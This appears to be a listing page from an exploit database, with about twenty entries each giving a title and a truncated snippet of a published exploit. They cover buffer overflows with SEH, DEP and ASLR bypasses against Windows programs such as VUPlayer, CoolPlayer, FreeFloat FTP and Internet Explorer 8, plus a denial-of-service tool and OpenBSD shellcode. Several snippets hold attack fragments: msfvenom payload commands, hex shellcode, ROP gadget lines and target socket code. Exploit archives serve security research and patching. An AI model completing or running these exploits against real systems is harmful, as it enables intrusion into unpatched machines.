10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) (DEP Bypass) Exploit

Exploit for windows platform in category local exploits !/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow SEHDEP Bypass Vulnerable Software: 10-Strike Network Inventory Explorer 8.54 Vendor Homepage:...

Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass)

Faleemi Desktop Software 1.8 - Local Buffer Overflow SEH DEP Bypass !/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow SEHDEP Bypass Date: 01-26-19 Vulnerable Software: Faleemi Desktop Software 1.8 Vendor Homepage:...

R 3.4.4 (Windows 10 x64) Buffer Overflow

!/usr/bin/python R 3.4.4 Win10 x86 Buffer Overflow discovered by: bzyo author: Charles Truscott I love you Alison Thompson OAM tested on: Windows 10 x86 rebooted for practice defeating ASLR/DEP -------------------------------------------- GUI Preferences - paste boom.txt into 'Language for menus...

VUPlayer 2.49 .pls Stack Buffer Overflow

!/usr/bin/python import os,sys Tested Windows 7 Home x86 & Windows 10 Home x86x64 badchars \x00\x0a\x1a\x20\x40 msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a\x20\x40" -f python buf = "" buf += "\xbf\x3b\x99\xdd\xa3\xdb\xc4\xd9\x74\x24\xf4\x58\x29" buf +=...

MY-MP3-Player-3.0-m3u

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe - 1014 bytes of space for shellcode shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...

Mini-Stream-Ripper-2.9.7-DEP

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...

NCMedia-Sound-Editor-Pro-7.5.1-SEH-DEP

Exploit: NCMedia Sound Editor Pro v7.5.1 SEHDEP Author: b33f - http://www.fuzzysecurity.com/ OS: Windows 7 Pro SP1 probably universal across 32-bit POC - Julien Ahrens XP SP3 Software: http://www.soundeditorpro.com/ import sys, socket, struct file="MRUList201202.dat"...

Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)

Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 4.1.x Bypass MS12-037 function strtointstr return str.charCodeAt10x10000 + str.charCodeAt0; var free = "EEEE"; while free.length 500 free += free; var string1 = "AAAA"; while string1.length 500 string1 += string1; var...

CoolPlayer 2.18 - DEP Bypass

No description provided by source. Exploit Title: CoolPlayer 2.18 DEP Bypass Date: January 2, 2011 Author: Blake Version: 2.18 Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-DB Notes: May not wor...

BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)

No description provided by source. Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian -...

Denial-Of-Service

This Denial Of Service tool uses raw IP packets in no-novel ways to try stress the web target hosts childs It was designed to rapidly scan create 48 connections and it works fine against single hosts Required 2MB ADSL/Cable Bandwith in order to work properly Modified by JSacco -...

Aviosoft-Digital

Aviosoft 1.x Win 7 and XP SP2/SP3 English Buffer Overflow Stack Overflow ToDo: Add Remote ToDo: Test Vulnerable Targets import struct totalsize = 5000 junk = 'A' 872 align = 'B' 136 aslr, dep bypass using pushad technique seh = struct.pack' ebx rop+= struct.pack'L', 0x640203fc ADD EAX,5EC68B64 RE...

FreeFloat FTP Server Buffer Overflow

!/usr/bin/python import socket, sys from struct import pack print "\n===============================" print "Freefloat FTP Server DEP Bypass" print " Written by Blake " print "===============================\n" if lensys.argv != 3: print " Usage: %s \n" % sys.argv0 sys.exit0 target = sys.argv1 po...

MY MP3 Player 3.0 - '.m3u' DEP Bypass

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print " MY MP3 Player DEP Bypass " print " Bypass OptIn/OptOut Policy " print " Tested on Windows XP SP3 " print " Written by Blake " print...

MY MP3 Player 3.0 m3u Exploit DEP Bypass

Exploit for windows platform in category local exploits written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print " MY MP3 Player DEP Bypass " print " Bypass OptIn/OptOut Policy " print " Tested on Windows XP S...

Mini-Stream Ripper 2.9.7 DEP Bypass

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print "Mini-Stream 2.9.7 DEP Bypass" print " Written by Blake " print " Tested on Windows XP SP3 " print "============================\n" calc.exe shellcode =...

Mini-Stream Ripper 2.9.7 DEP Bypass

Exploit for windows platform in category local exploits written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print "Mini-Stream 2.9.7 DEP Bypass" print " Written by Blake " print " Tested on Windows XP SP3 " pri...

Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow

This module exploits a stack buffer overflow in process bcaaa-130.exe port 16102, which comes as part of the Blue Coat Authentication proxy. Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution in some cases, it takes as many...

OpenBSD/x86 sys_execve ('/bin/sh -c "reboot"') - 178 bytes (encoded)

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

CoolPlayer 2.18 DEP Bypass

Exploit for windows platform in category local exploits Exploit Title: CoolPlayer 2.18 DEP Bypass Date: January 2, 2011 Author: Blake Version: 2.18 Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-...